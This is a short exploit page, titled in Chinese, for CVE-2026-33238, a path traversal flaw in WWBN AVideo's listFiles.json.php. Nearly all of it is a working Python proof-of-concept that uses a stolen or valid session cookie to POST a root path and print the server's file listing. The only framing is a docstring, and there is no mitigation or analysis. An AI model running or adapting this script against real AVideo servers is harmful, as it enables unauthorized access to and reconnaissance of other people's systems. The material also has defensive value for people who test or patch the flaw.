CVE-2026-33238: WWBN AVideo路径遍历漏洞

import requests def exploit(target_url, session_cookie): """ PoC for CVE-2026-33238: Path Traversal in listFiles.json.php Requires an authenticated session. """ endpoint = f"{target_url}/listFiles.json.php" headers = {"Cookie": f"PHPSESSID={session_cookie}"} # Try to list files in the root directory data = {"path": "/"} try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Success! Response from {target_url}:") print(response.text) else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target and session exploit("http://localhost/avideo", "valid_session_id")